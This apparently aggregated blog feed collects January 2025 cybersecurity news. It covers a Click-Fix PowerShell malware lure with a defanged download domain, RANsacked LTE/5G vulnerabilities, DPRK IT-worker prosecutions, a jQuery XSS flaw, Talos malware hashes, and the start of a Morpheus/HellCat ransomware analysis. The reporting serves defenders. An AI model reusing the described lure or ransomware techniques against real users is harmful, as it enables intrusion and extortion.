Sunday, January 26, 2025

Big Announcements or BIG Announcements?

At a time when many AI and Cloud announcements are happening, how can we determine which ones are important, disruptive, or just me-too? 

SHOW: 892

SHOW TRANSCRIPT: The Cloudcast #892 Transcript

SHOW VIDEO: https://youtube.com/@TheCloudcastNET 

CLOUD NEWS OF THE WEEK: http://bit.ly/cloudcast-cnotw

CHECK OUT OUR NEW PODCAST: "CLOUDCAST BASICS"

SHOW NOTES:


REACTING AND PLANNING WHEN SO MANY BIG ANNOUNCEMENTS ARE HAPPENING

  • Why is the announcement happening now?
  • What are the facts of the announcement?
  • How are Enterprises thinking about these announcements?
  • How are Enterprises thinking about how this pace of change impacts their thinking?
  • What are the technology impacts of the announcement?
  • What are the direct economic impacts of the announcement? Secondary impacts?
    • OpenAI profitability?
    • NVIDIA ability to charge premium for leading-edge chips?
    • Pricing for any AI offering (Co-Pilots, etc.)
    • Write-offs of existing GPU/Training investments?


FEEDBACK?



from The Cloudcast (.NET) https://ift.tt/Z0YLJuW
via IFTTT

Friday, January 24, 2025

The Good, the Bad and the Ugly in Cybersecurity – Week 4

The Good | OFAC Sanctions DPRK IT Workers & Attackers Linked to Salt Typhoon Treasury Attack

The U.S. Treasury Department’s OFAC issued back-to-back sanctions this week, aiming to box in North Korean IT workers as well as a Chinese-based actor and firm for their roles in the recent breach of the Treasury’s systems.

Long cautioned by the FBI, “IT warriors” from North Korea pose as U.S. professionals, seeking employment with IT firms to fund the sanctions-riddled regime. The DPRK relies on this network of front companies and individuals to funnel their wages, thus funding the state’s weapons programs and other destabilizing activities. The IT worker scheme has so far produced a stream of revenue worth over $88 million in the last six years.

Sanctioned entities include Korea Osong Shipping Co., Chonsurim Trading Corporation, and Liaoning China Trade, an electronics supplier working with North Korean weapons-traders. The sanctions freeze U.S.-based assets and ban transactions with all listed entities. Currently, the State Department offers up to $5 million for tips on disrupting DPRK-based front companies.

Chinese cybersecurity firm Sichuan Juxinhe and Shanghainese threat actor Yin Kecheng have also been sanctioned for the December attack on Treasury networks and their ties to Salt Typhoon. OFAC states that Yin Kecheng is a notable actor, linked to China’s Ministry of State Security (MSS) and accused of targeting government agencies and critical infrastructure networks. Both the MSS and Sichuan Juxinhe reportedly had direct involvement in the Treasury attack, as well as the exploitation of multiple U.S. telecom giants and internet service providers.

Investigators note that 400 laptops and desktop machines were compromised, allowing access to thousands of sensitive files. The department’s Rewards for Justice program also offers up to $10 million for information that helps identify actors targeting the U.S. government and critical infrastructure.

The Bad | Fake Accounts on X Use ‘Click-Fix’ Tactic to Lure Users & Deploy Malware

News of Ross Ulbricht’s presidential pardon this week has now become a lure used by threat actors on X to trick unsuspecting users into running a PowerShell code that distributes malware. Discovered by vx-underground, the attack leverages a new variant of the ‘Click-Fix’ tactic that has been popular with cybercriminals this past year.

Threat actors are observed using fake ‘verified’ Ulbricht accounts to direct X users to malicious Telegram channels that claim to be official portals. Once on Telegram, users are presented with a fake identity verification process called ‘Safeguard’, leading them to a Telegram mini-app that copies the PowerShell command to the user’s clipboard. The users are then instructed to paste and run the command in a Windows Run dialog, which triggers a script downloading a ZIP file from http://openline[.]cyou.

Source: BleepingComputer

The ZIP file includes identity-helper.exe, suspected to be a Cobalt Strike loader. Though Cobalt Strike is a legitimate penetration testing tool, it is often repurposed by attackers for remote access, data theft, and ransomware deployment. The attack leverages the latest version of the ‘Click-Fix’ tactic, which disguises malware distribution as a verification or troubleshooting process. Language used throughout the attack is noted to be specially crafted to avoid suspicion and prolong the deception.

As a best practice, users are advised to avoid executing commands or scripts copied from unknown sources, especially via PowerShell or Windows Run. Whenever unsure, paste the script into a text editor to inspect it for suspicious or obfuscated code.

The Ugly | Attack on Educational Tech Provider Exposes 60 Million Student’s Personal Data

The threat actor behind the recent attack on PowerSchool, a cloud-based education technology provider, has claimed they stole the personally identifiable information (PII) of 62.4 million students and 9.5 million teachers across over 6500 U.S and Canadian school districts.

Source: Wbay.com

The threat actor used stolen credentials to access PowerSchool’s customer support portal and downloaded data from PowerSIS (student information system) databases via a maintenance tool. Investigations report that exposed data from the breach includes Social Security Numbers, medical records, and grades, varying by district. PowerSchool’s FAQ states that it paid a ransom to prevent public data leaks and that the tech solutions provider has not experienced any operational disruptions or seen continued signs of unauthorized activity within PowerSchool environments.

Collected reports allege that the top three affected districts include the Toronto District School Board, Peel District School Board, and Dallas Independent School District by number of students impacted. According to PowerSchool representatives, the type of data exposed in the breach varies by district, following individual district or state policies.

Given the differing policies across those affected, the tech company notes that less than a quarter of impacted students had Social Security Numbers exposed. PowerSchool now provides two years of free identity protection and credit monitoring services for impacted individuals and is notifying stakeholders on customers’ behalf. A public website and updates to a customer-only FAQ are available for ongoing developments.

Educational institutions continue to be a lucrative target for cyberattackers for the wealth of personal, medical, and financial information they hold. Sold often on dark markets and forums, this diversity of data is often exploited later in identity fraud, financial schemes, and instances of blackmailing.



from SentinelOne https://ift.tt/xBYS2PA
via IFTTT

RANsacked: Over 100 Security Flaws Found in LTE and 5G Network Implementations

Jan 24, 2025Ravie LakshmananTelecom Security / Vulnerability

A group of academics has disclosed details of over 100 security vulnerabilities impacting LTE and 5G implementations that could be exploited by an attacker to disrupt access to service and even gain a foothold into the cellular core network.

The 119 vulnerabilities, assigned 97 unique CVE identifiers, span seven LTE implementations – Open5GS, Magma, OpenAirInterface, Athonet, SD-Core, NextEPC, srsRAN – and three 5G implementations – Open5GS, Magma, OpenAirInterface, according to researchers from the University of Florida and North Carolina State University.

The findings have been detailed in a study titled "RANsacked: A Domain-Informed Approach for Fuzzing LTE and 5G RAN-Core Interfaces."

"Every one of the >100 vulnerabilities discussed below can be used to persistently disrupt all cellular communications (phone calls, messaging and data) at a city-wide level," the researchers said.

"An attacker can continuously crash the Mobility Management Entity (MME) or Access and Mobility Management Function (AMF) in an LTE/5G network, respectively, simply by sending a single small data packet over the network as an unauthenticated user (no SIM card required)."

The discovery is the result of a fuzzing exercise, dubbed RANsacked, undertaken by the researchers against Radio Access Network (RAN)-Core interfaces that are capable of receiving input directly from mobile handsets and base stations.

The researchers said several of the identified vulnerabilities relate to buffer overflows and memory corruption errors that could be weaponized to breach the cellular core network, and leverage that access to monitor cellphone location and connection information for all subscribers at a city-wide level, carry out targeted attacks on specific subscribers, and perform further malicious actions on the network itself.

What's more, the identified flaws fall under two broad categories: Those that can be exploited by any unauthenticated mobile device and those that can be weaponized by an adversary who has compromised a base station or a femtocell.

Of the 119 vulnerabilities discovered, 79 were found in MME implementations, 36 in AMF implementations, and four in SGW implementations. Twenty-five shortcomings lead to Non-Access Stratum (NAS) pre-authentication attacks that can be carried out by an arbitrary cellphone.

"The introduction of home-use femtocells, followed by more easily-accessible gNodeB base stations in 5G deployments, represent a further shift in security dynamics: where once physically locked-down, RAN equipment is now openly exposed to physical adversarial threats," the study noted.

"Our work explores the implications of this final area by enabling performant fuzzing interfaces that have historically been assumed implicitly secure but now face imminent threats."

Found this article interesting? Follow us on Twitter and LinkedIn to read more exclusive content we post.



from The Hacker News https://ift.tt/c7qIKur
via IFTTT

2025 State of SaaS Backup and Recovery Report

The modern workplace has undergone a seismic transformation over recent years, with hybrid work becoming the norm and businesses rapidly adopting cloud-based Software-as-a-Service (SaaS) applications to facilitate it. SaaS applications like Microsoft 365 and Google Workspace have now become the backbone of business operations, enabling seamless collaboration and productivity. However, this dependence on SaaS solutions has also attracted a surge in cyberthreats, exposing critical business data to risks like ransomware and phishing attacks.

Amid these challenges, the 2025 State of SaaS Backup and Recovery Report offers a timely analysis of the SaaS data protection landscape. By surveying over 3,700 IT professionals from diverse industries and company sizes, this report highlights trends, challenges and solutions shaping the future of SaaS data resilience. For organizations seeking clarity in navigating these turbulent waters, the findings provide invaluable guidance.

Key revelations from the report are both eye-opening and concerning. For instance, 87% of IT professionals reported experiencing SaaS data loss in 2024, with malicious deletions as the leading cause. Moreover, while 61% of applications and workloads are expected to run on public cloud platforms in the next two years, only 14% of IT leaders feel confident they can recover critical SaaS data within minutes following an incident. These findings underscore an urgent call to action for businesses to strengthen their data resilience strategies.

In this blog, we'll uncover the survey's key findings, revealing how organizations are adapting to meet the ongoing challenges. From revealing the biggest threats to understanding the strategies IT leaders are leveraging to stay ahead, you'll gain a clear picture of the trends shaping SaaS data protection.

The shift toward cloud: Major trends reshaping modern IT operations

Organizations worldwide are increasingly relying on hybrid cloud environments, with 54% of workloads and applications already cloud-hosted. This trend shows no signs of slowing down, as businesses anticipate growing this figure to 61% by 2026. The acceleration of cloud adoption reflects the critical role cloud solutions play in driving digital transformation and enabling organizations to scale effectively.

What's driving cloud adoption?

The benefits propelling rapid cloud migration are clear: leveraging cloud platforms allows organizations to enhance operational efficiency, optimize strategic analytics and support real-time decision-making. However, this enthusiasm comes with a caveat — companies are carefully navigating concerns about data sensitivity, security and compliance as they transition.

Data types moving to the cloud

Certain types of data dominate cloud migration trends, illustrating where organizations feel confident leveraging the cloud's potential. The top candidates for data migration to the cloud include:

  1. Non-sensitive analytics data (39%): Leading the pack, these datasets highlight the cloud's role in powering strategic insights.
  2. The Internet of Things (IoT) and edge data (34%): The inclusion of high-velocity datasets reflects growing trust in the cloud's ability to handle real-time analytics at scale.
  3. Sales and orders data (34%): Organizations are increasingly turning to cloud-hosted solutions to drive operational efficiency in sales processes.

Data that's staying on-premises

Despite the allure of the cloud, businesses are cautious about entrusting their most sensitive information to third-party environments. The top candidates for data to remain on-premises include:

  1. Personally identifiable information (PII) and protected health information (PHI) (42%): Strict regulations and concerns about breaches keep this data largely on-premises.
  2. Corporate financial data (42%): Companies remain wary of potential risks in the cloud for critical financial records.
  3. Sensitive intellectual property (40%): Maintaining tight control over proprietary assets remains a top priority.

Top use cases for public cloud adoption

Cloud adoption is driven by practical needs that align with modern business challenges:

  • Collaboration (39%): The flexibility and scalability of cloud solutions are essential for supporting hybrid and remote work environments.
  • Disaster recovery (37%): Ensuring fast recovery and protecting data from loss or downtime remain critical priorities.
  • Data warehousing and Database-as-a-Service (32%): Organizations value the cloud's ability to manage large datasets and enable seamless data-driven operations.

SaaS application trends in 2024

The adoption of SaaS applications continues to transform how businesses collaborate, manage operations and scale their services. Collaboration platforms remain at the forefront of SaaS adoption, reflecting their critical role in today's hybrid and remote work environments.

Microsoft 365 retains leadership while Google Workspace gains momentum

Microsoft 365 maintains its position as the leader in SaaS collaboration solutions, with a 53% adoption rate among survey respondents. However, this represents a decline from its 71% adoption rate in 2022, indicating a potential shift in preferences or increasing competition in the SaaS space.

Meanwhile, Google Workspace has seen a consistent rise in adoption, climbing to 35% in 2024 compared to 25% in 2022. This growth is particularly pronounced among SMBs, with 38% adoption compared to 32% among enterprises.

Diverging SaaS adoption trends between SMBs and enterprises

The survey also highlighted distinct preferences between SMBs and enterprise organizations when it comes to SaaS tools:

  • SMBs favor applications that simplify everyday operations and finance management, such as:
    • Google Workspace: 38% of SMBs vs. 32% of enterprises.
    • Dropbox: 26% of SMBs vs. 20% of enterprises.
    • Intuit QuickBooks: 20% of SMBs vs. 17% of enterprises.
  • Enterprises lean towards tools that support large-scale operations and customer engagement, such as:
    • Microsoft Dynamics: 32% of enterprises vs. 28% of SMBs.
    • Salesforce: 28% of enterprises vs. 22% of SMBs.
    • HubSpot: 24% of enterprises vs. 20% of SMBs.

What are the major barriers to cloud adoption?

Despite the widespread adoption of cloud solutions, many organizations face significant hurdles in migrating workloads and data to the cloud.

  • Cloud cost optimization (24%): Managing expenses during and after migration remains the top concern for organizations.
  • Compatibility and performance issues (20%): Ensuring workloads function seamlessly post-migration is another significant hurdle that causes delays and disruptions.
  • Some organizations also face difficulties with provider selection and feasibility (15%), post-migration management (14%), right-sizing cloud instances (8%), licensing complexities (7%) and managing application dependencies (5%).

The gaps IT pros can't ignore: Why confidence in recovery is low

Backup strategies are essential to securing critical SaaS data, yet IT professionals' confidence in these systems remains alarmingly low.

Backup strategy adoption across SaaS platforms

Organizations leveraging SaaS applications report varying levels of backup strategy implementation:

  • Microsoft 365: 70% have a backup strategy in place, the highest among SaaS platforms.
  • Google Workspace: 66% of users report having a backup plan, reflecting strong adoption.
  • Salesforce: Only 53% have a dedicated backup strategy, signaling a critical vulnerability.

Low confidence in backup system effectiveness

Despite the presence of backup strategies, only 40% of IT professionals expressed confidence in their systems' ability to protect critical data during a crisis. This hesitancy is fueled by:

  • Outdated backup solutions: Over 28% of respondents indicated their backup systems haven't evolved in five years, leaving them ill-equipped to handle modern-day threats.
  • Dissatisfaction with existing solutions: Nearly 30% of IT pros believe their backup and recovery tools fall short of what their organization needs.
  • Fewer than 10% of respondents feel their organization's approach to backup and disaster recovery is sufficient without requiring any changes.

What are the challenges in backup management?

Managing backups for SaaS applications presents unique challenges, varying by platform and user cohort. The survey reveals distinct pain points for users of Microsoft 365, Google Workspace and Salesforce:

  • Data recovery issues: Google Workspace (23%) and Salesforce (23%) users report the highest rates of difficulty with data recovery, compared to 20% of Microsoft 365 users.
  • Alerting and reporting: Google Workspace users (11%) are most challenged in setting up and managing alerts, surpassing Microsoft 365 (8%) and Salesforce (8%) users.
  • Compliance maintenance: Salesforce users (24%) struggle most with maintaining compliance, followed by Google Workspace (23%) and Microsoft 365 (21%).

The growing time burden of backup management

Backup management has become increasingly time-intensive for IT teams:

  • Over 50% of respondents spend more than two hours daily — equating to over 10 hours per week — on monitoring, managing and troubleshooting backups.
  • The cohort spending less than one hour daily has dropped sharply, from 39% in 2022 to 23% in 2024, while those dedicating three or more hours daily have grown from 5% in 2022 to 14% in 2024.

How organizations are securing backup infrastructure

The majority of organizations report having policies and controls in place to secure access to their backups across key areas, including public cloud (77%), servers or virtual machines (76%), SaaS applications (74%) and endpoints/PCs (73%).

While these numbers reflect a proactive approach, around 25% of organizations still lack policies and controls for backup security, presenting vulnerabilities in an increasingly hybrid and multicloud environment.

What are the major causes of SaaS data loss?

SaaS data loss remains a significant challenge, with only 13% of organizations reporting no data loss incidents in the past year. Key causes include:

  • Malicious deletion: More than 50% of organizations suffered data loss from malicious deletion, 29% were impacted by external threats and 27% by insider actions.
  • Accidental deletion: 34% of respondents experienced data loss due to human error.
  • Misconfigurations: 30% of organizations faced data loss due to improper setup or maintenance.
  • Integration issues: Conflicts with third-party applications affected 30% of respondents.
  • Technical errors: 18% experienced scripting errors, while 14% faced sync issues.

The race to recovery: How quickly can organizations restore lost SaaS data?

The ability to swiftly recover lost SaaS data is critical for minimizing downtime and avoiding costly compliance breaches. Yet, recovery times vary widely:

  • Only 14% of organizations surveyed can recover within minutes, ensuring minimal disruption.
  • Just over 40% achieve recovery within hours, meeting operational and regulatory demands.
  • About 35% require days or weeks, risking prolonged downtime and potential non-compliance.
  • Alarmingly, 8% are unsure of recovery times, and 2% cannot recover lost data at all.

Recovery of SaaS data objects

The frequency of recovering SaaS data objects is as follows:

  • Most frequently recovered:
    • Email (20%) and mail contacts (17%) are restored daily, emphasizing their critical role in communication and business continuity.
  • Least frequently recovered:
    • Calendar objects (15%) and messaging app data (16%) see fewer recovery incidents, indicating lower frequency of loss or reduced immediate operational impact.

Key takeaways and recommendations from the 2025 State of SaaS Backup and Recovery Report

The 2025 State of SaaS Backup and Recovery Report paints a vivid picture of the evolving SaaS data protection landscape. Cloud adoption continues to surge among organizations, driven by the operational efficiency and scalability of SaaS platforms. Yet, alongside these advancements lie significant challenges. From tackling data threats to addressing the complexities of backup management, the findings highlight an urgent need for businesses to rethink and modernize their data protection strategies.

On that front, businesses must adopt a comprehensive, scalable backup strategy that aligns with the complexities of today's hybrid and multicloud environments. Such a strategy should include robust data protection and rapid recovery capabilities to address SaaS data threats like accidental deletions and ransomware attacks. By investing in the right tools and practices, organizations can enhance their data resilience, minimize downtime and confidently meet the demands of an increasingly cloud-driven future.

For deeper insights into the SaaS world and actionable recommendations, download the full 2025 State of SaaS Backup and Recovery Report.

Found this article interesting? This article is a contributed piece from one of our valued partners. Follow us on Twitter and LinkedIn to read more exclusive content we post.



from The Hacker News https://ift.tt/5ZMvtdy
via IFTTT

DoJ Indicts 5 Individuals for $866K North Korean IT Worker Scheme Violations

The U.S. Department of Justice (DoJ) on Thursday indicted two North Korean nationals, a Mexican national, and two of its own citizens for their alleged involvement in the ongoing fraudulent information technology (IT) worker scheme that seeks to generate revenue for the Democratic People's Republic of Korea (DPRK) in violation of international sanctions.

The action targets Jin Sung-Il (진성일), Pak Jin-Song (박진성), Pedro Ernesto Alonso De Los Reyes, Erick Ntekereze Prince, and Emanuel Ashtor. Alonso, who resides in Sweden, was arrested in the Netherlands on January 10, 2025, after a warrant was issued.

All five defendants have been charged with conspiracy to cause damage to a protected computer, conspiracy to commit wire fraud and mail fraud, conspiracy to commit money laundering, and conspiracy to transfer false identification documents. Jin and Pak have also been charged with conspiracy to violate the International Emergency Economic Powers Act. If convicted, each of them faces a maximum penalty of 20 years in prison.

The development is the latest step taken by the U.S. government to disrupt the ongoing campaign that involves North Korean nationals using forged and stolen identities to obtain remote IT work at U.S. companies through laptop farms operated within the country.

Other efforts include the August 2024 arrest of a Tennessee man for helping North Koreans land jobs in U.S. firms and the indictment of 14 DPRK nationals last month for purportedly generating $88 million over the course of a six-year conspiracy. Last week, the U.S. Treasury sanctioned two North Korean nationals and four companies based in Laos and China for their work on the IT worker scheme.

"From approximately April 2018 through August 2024, the defendants and their unindicted co-conspirators obtained work from at least sixty-four U.S. companies," the DoJ said. "Payments from ten of those companies generated at least $866,255 in revenue, most of which the defendants then laundered through a Chinese bank account."

According to the indictment document, Jin applied for a position at an unnamed U.S. IT company in June 2021 by using Alonso's identity with his consent and one of Ntekereze's New York addresses, subsequently securing the opportunity for a salary of $120,000 per year.

Ashtor's North Carolina residence, per the department, operated a laptop farm that hosted the company-provided laptops with the goal of deceiving the companies into thinking that their new hires were located in the country when, in reality, they have been found to remotely log in to these systems from China and Russia.

Both Ntekereze and Ashtor received laptops from U.S. company employers at their homes and proceeded to download and install remote access software like AnyDesk and TeamViewer without authorization in order to facilitate the remote access. They also conspired to launder payments for the remote IT work through a variety of accounts designed to promote the scheme and conceal its proceeds.

In furtherance of the scheme, Ntekereze is said to have used his company Taggcar Inc. to invoice a U.S. staffing company eight times, totaling about $75,709, for the IT work performed by Jin, who was masquerading as Alonso. A portion of the payment was then transferred to an online payment platform held in the name of Alonso that was accessible to both Jin and Alonso.

The wide-ranging effort by North Korea to have their citizens employed at companies across the world is seen as an attempt to earn high-paying IT salaries that can be funneled back to the country to serve the regime's priorities and gain access to sensitive documents for financial leverage.

The IT worker scam, as reiterated by the U.S. Federal Bureau of Investigation (FBI) in a separate advisory, involves the use of pseudonymous email, social media, and online job site accounts, as well as false websites, proxy computers, and witting and unwitting third-parties located in the U.S. and elsewhere.

"In recent months, in addition to data extortion, FBI has observed North Korean IT workers leveraging unlawful access to company networks to exfiltrate proprietary and sensitive data, facilitate cyber-criminal activities, and conduct revenue-generating activity on behalf of the regime," the agency said.

"After being discovered on company networks, North Korean IT workers have extorted victims by holding stolen proprietary data and code hostage until the companies meet ransom demands. In some instances, North Korean IT workers have publicly released victim companies' proprietary code."

Other instances entail the theft of company code repositories from GitHub and attempts to harvest sensitive company credentials and session cookies to initiate work sessions from non-company devices.

It's not just a U.S. phenomenon, as a new report from threat intelligence firm Nisos reveals that several Japanese firms have also landed themselves in the crosshairs of DPRK IT workers. It specifically highlighted the case of one such IT worker who has held software engineering and full-stack developer roles with different firms since January 2023.

The IT worker personas have been fleshed out digitally to lend it a veneer of legitimacy, complete with accounts on GitHub and freelance employment websites like LaborX, ProPursuit, Remote OK, Working Not Working, and Remote Hub, not to mention a personal website containing manipulated stock images.

"The individual appears to be currently employed under the name Weitao Wang at Japanese consulting company, Tenpct Inc., and appears to have been previously employed under the name Osamu Odaka at Japanese software development and consulting firm, LinkX Inc.," the company said in a report shared with The Hacker News.

Found this article interesting? Follow us on Twitter and LinkedIn to read more exclusive content we post.



from The Hacker News https://ift.tt/yfBLz0d
via IFTTT

Android's New Identity Check Feature Locks Device Settings Outside Trusted Locations

Jan 24, 2025Ravie LakshmananBiometric / Mobile Security

Google has launched a new feature called Identity Check for supported Android devices that locks sensitive settings behind biometric authentication when outside of trusted locations.

"When you turn on Identity Check, your device will require explicit biometric authentication to access certain sensitive resources when you're outside of trusted locations," Google said in a post announcing the move.

In doing so, biometric authentication will be required for the following actions -

  • Access saved passwords and passkeys with Google Password Manager
  • Autofill passwords in apps from Google Password Manager, except in Chrome
  • Change screen lock, like PIN, pattern, and password
  • Change biometrics, like Fingerprint or Face Unlock
  • Run a factory reset
  • Turn off Find My Device
  • Turn off any theft protection features
  • View trusted places
  • Turn off Identity Check
  • Set up a new device with your current device
  • Add or remove a Google Account
  • Access Developer options

Identity Check is also designed to turn on enhanced protection for Google Accounts to prevent unauthorized individuals from taking control of any Google Account signed in on the device.

The feature is currently limited to Google's own Pixel phones with Android 15 and eligible Samsung Galaxy phones running One UI 7. It can be enabled by navigating to Settings > Google > All services > Theft protection > Identity Check.

The disclosure comes as Google has been adding a steady stream of security features to secure devices against theft, such as Theft Detection Lock, Offline Device Lock, and Remote Lock.

Google also said it has rolled out its artificial intelligence-powered Theft Detection Lock to all Android devices running Android 10 and later across the world, and that it's working with the GSMA and industry experts to combat mobile device theft by sharing information, tools and prevention techniques.

The development also follows the launch of the Chrome Web Store for Enterprises, allowing organizations to create a curated list of extensions that can be installed in employees' web browsers and minimize the risk of users installing potentially harmful or unvetted add-ons.

Last month, a spear-phishing campaign targeting Chrome extension developers was found to have inserted malicious code to harvest sensitive data, such as API keys, session cookies, and other authentication tokens from websites such as ChatGPT and Facebook for Business.

The supply chain attack is said to have been active since at least December 2023, French cybersecurity company Sekoia said in a new analysis published this week.

"This threat actor has specialised in spreading malicious Chrome extensions to harvest sensitive data," the company said, describing the adversary as persistent.

"At the end of November 2024, the attacker shifted his modus operandi from distributing his own malicious Chrome extensions via fake websites to compromising legitimate Chrome extensions by phishing emails, malicious OAuth applications, and malicious code injected into compromised Chrome extensions."

Found this article interesting? Follow us on Twitter and LinkedIn to read more exclusive content we post.



from The Hacker News https://ift.tt/DVYSL6r
via IFTTT

CISA Adds Five-Year-Old jQuery XSS Flaw to Exploited Vulnerabilities List

Jan 24, 2025Ravie LakshmananVulnerability / JavaScript

The U.S. Cybersecurity and Infrastructure Security Agency (CISA) on Thursday placed a now-patched security flaw impacting the popular jQuery JavaScript library to its Known Exploited Vulnerabilities (KEV) catalog, based on evidence of active exploitation.

The medium-severity vulnerability is CVE-2020-11023 (CVSS score: 6.1/6.9), a nearly five-year-old cross-site scripting (XSS) bug that could be exploited to achieve arbitrary code execution.

"Passing HTML containing <option> elements from untrusted sources - even after sanitizing them - to one of jQuery's DOM manipulation methods (i.e. .html(), .append(), and others) may execute untrusted code," according to a GitHub advisory released for the flaw.

The problem was addressed in jQuery version 3.5.0 released in April 2020. A workaround for CVE-2020-11023 involves using DOMPurify with the SAFE_FOR_JQUERY flag set to sanitize the HTML string before passing it to a jQuery method.

As is typically the case, the advisory from CISA is lean on details about the specific nature of exploitation and the identity of threat actors weaponizing the shortcoming. Nor are there any public reports related to attacks that leverage the flaw in question.

That said, Dutch security firm EclecticIQ revealed in February 2024 that the command-and-control (C2) addresses associated with a malicious campaign exploiting security flaws in Ivanti appliances ran a version of JQuery that was susceptible to at least one of the three flaws, CVE-2020-11023, CVE-2020-11022, and CVE-2019-11358.

Pursuant to Binding Operational Directive (BOD) 22-01, Federal Civilian Executive Branch (FCEB) agencies are recommended to remediate the identified flaw by February 13, 2025, to secure their networks against active threats.

Found this article interesting? Follow us on Twitter and LinkedIn to read more exclusive content we post.



from The Hacker News https://ift.tt/B9pwx6D
via IFTTT

Thursday, January 23, 2025

Everything is connected to security

Everything is connected to security

Welcome to this week’s edition of the Threat Source newsletter.

Hello friends! Joe here again! I have just returned from the frozen northern tundra of Fargo, North Dakota. This was my first real visit to the frigid climates of the Midwest, and I have to say, they take cold to a new level. I was invited to present on cybersecurity at the 32nd Crop Insurance Conference, hosted by North Dakota State University (go Bisons!).

If you’re wondering why I or anyone would care to discuss cybersecurity in such a niche industry, the answer is simple: Everything is connected to security, even something you wouldn’t think would nominally matter. Agriculture and adjacent industries are roughly 6 percent of our GDP and account for about 10 percent of all U.S. jobs. The trillions of dollars that industry generates are targets for cyber-crime-motivated threat actors and nation-states who would seek to degrade it.

Agriculture is also a deeply underserved community and industry with regard to cybersecurity. And that’s both in general security literacy and security investments. So, I have a soft spot for folks up against threat actors who seek to exploit the most vulnerable, like agriculture industries. If the knowledge I can share will help them and their businesses stay more secure, it’s always worth it.

Pro-tip: If you ever find yourself at a conference, maybe to give a presentation, stay and listen beyond your time on the stage. For security conferences, sure, but for super niche or industry-specific conferences? Even better. I’m not a farmer or in agriculture, but I learned a lot in North Dakota. So, sit through other presentations – the further away from cyber security it is, the better. There’s more to this industry than malware analysis, threat actor cluster tracking, and incident response. For example, at this conference, I learned about climate change affecting agriculture, trade tariffs, agronomics, and insurance. You never know when that knowledge will pay dividends down the road for cybersecurity research. Stay curious, be a forever student, and keep learning.

The one big thing

Remember the old meme ‘Good luck, I’m behind seven proxies? Well, it still holds up in this Talos blog post. Proxy chains are something that hit our radar as old as VPNFilter, back in 2018. It’s a smart way to do business if your obscurity is your primary goal. TOR or other proxy solutions may have weaknesses that expose your operations to risk, and that’s why they’re getting more and more crafty about it. And we’ve moved far past generic VPN services for obscurity. Network defenders can find themselves between a rock and a hard place forensically when determining malicious connections to their networks.

Why do I care?

This is always going to be a sore point for network defenders. Adversaries are absolutely going to use and abuse any kind of proxy service to launch their attacks from. It’s an absolute given. It goes off the rails when it’s your own employees too. As per the blog post “Organizations need to realize that attacks can come from anywhere, even the same IP space that your employees connect to their VPNs, so plan accordingly.”

So now what?

Using additional controls and forensic data is a must here. Identity and access management, combined with a mobile device management/application solution is key here. Control as much of your ecosystem as you absolutely can. This isn’t cheap, but it’s most certainly a step up from implementing MFA and hoping for the best.

Top security headlines of the week

  • Hold onto your seats – Mirai came in super-hot with a massive 5.6 Tbps DDoS attack. So far, the largest ever recorded. (Hacker News)
  • Here’s some sobering statistics about healthcare data breaches. “Between 2009 and 2023, 5,887 healthcare data breaches of 500 or more records were reported to OCR [sic] Office of Civil Rights. Those breaches have resulted in the exposure or impermissible disclosure of 519,935,970 healthcare records. That equates to more than 1.5x the population of the United States.” (HIPAA Journal
  • Businesses are folding a lot more due to cyber-attacks, and mostly at small and medium-sized businesses, which absolutely jives with what we see at Talos. Ransomware cartels love to target the small business. Cyber Insurance may be the saving grace here. (Bloomberg Law

Can’t get enough Talos?

  • My colleague Martin Lee did an amazing Net Academy series on threat intelligence 101. If you’re a NetAcad member, I highly suggest you watch it! And if not, sign up. It’s free!
  • In running the biggest scam ever, I still get to be on Talos podcasts. Listen to myself and my colleagues discuss crossword puzzles and why Pauly Shore gets a bad rap.

Upcoming events where you can find Talos 

Cisco Live EMEA (February 9-14, 2025) 
Amsterdam, Netherlands

Most prevalent malware files from Talos telemetry over the past week 

SHA 256: 7b3ec2365a64d9a9b2452c22e82e6d6ce2bb6dbc06c6720951c9570a5cd46fe5
MD5: ff1b6bb151cf9f671c929a4cbdb64d86
VirusTotal: https://www.virustotal.com/gui/file/7b3ec2365a64d9a9b2452c22e82e6d6ce2bb6dbc06c6720951c9570a5cd46fe5  
Typical Filename: endpoint.query
Claimed Product: Endpoint-Collector
Detection Name: W32.File.MalParent

 

SHA 256: 9f1f11a708d393e0a4109ae189bc64f1f3e312653dcf317a2bd406f18ffcc507
MD5: 2915b3f8b703eb744fc54c81f4a9c67f
VirusTotal: https://www.virustotal.com/gui/file/9f1f11a708d393e0a4109ae189bc64f1f3e312653dcf317a2bd406f18ffcc507
Typical Filename: VID001.exe
Detection Name: Simple_Custom_Detection

 

SHA 256: 47ecaab5cd6b26fe18d9759a9392bce81ba379817c53a3a468fe9060a076f8ca
MD5: 71fea034b422e4a17ebb06022532fdde
VirusTotal: https://www.virustotal.com/gui/file/47ecaab5cd6b26fe18d9759a9392bce81ba379817c53a3a468fe9060a076f8ca
Typical Filename: VID001.exe
Claimed Product: N/A
Detection Name: Coinminer:MBT.26mw.in14.Talos

 

SHA 256: a31f222fc283227f5e7988d1ad9c0aecd66d58bb7b4d8518ae23e110308dbf91
MD5: 7bdbd180c081fa63ca94f9c22c457376
VirusTotal: https://www.virustotal.com/gui/file/a31f222fc283227f5e7988d1ad9c0aecd66d58bb7b4d8518ae23e110308dbf91/details%C2%A0
Typical Filename: c0dwjdi6a.dll
Claimed Product: N/A
Detection Name: Trojan.GenericKD.33515991

 



from Cisco Talos Blog https://ift.tt/MlOjUPq
via IFTTT

Experts Find Shared Codebase Linking Morpheus and HellCat Ransomware Payloads

Jan 23, 2025Ravie LakshmananThreat Intelligence / Data Breach

An analysis of HellCat and Morpheus ransomware operations has revealed that affiliates associated with the respective cybercrime entities are using identical code for their ransomware payloads.

The findings come from SentinelOne, which analyzed artifacts uploaded to the VirusTotal malware scanning platform by the same submitter towards the end of December 2024.

"These two payload samples are identical except for victim specific data and the attacker contact details," security researcher Jim Walter said in a new report shared with The Hacker News.

Both HellCat and Morpheus are nascent entrants to the ransomware ecosystem, having emerged in October and December 2024, respectively.

A deeper examination of the Morpheus/HellCat payload, a 64-bit portable executable, has revealed that both samples require a path to be specified as an input argument.

They are both configured to exclude the \Windows\System32 folder, as well as a hard-coded list of extensions from the encryption process, namely .dll, .sys, .exe, .drv, .com, and .cat, from the encryption process.

"An unusual characteristic of these Morpheus and HellCat payloads is that they do not alter the extension of targeted and encrypted files," Walter said. "The file contents will be encrypted, but file extensions and other metadata remain intact after processing by the ransomware."

Furthermore, Morpheus and HellCat samples rely on the Windows Cryptographic API for key generation and file encryption. The encryption key is generated using the BCrypt algorithm.

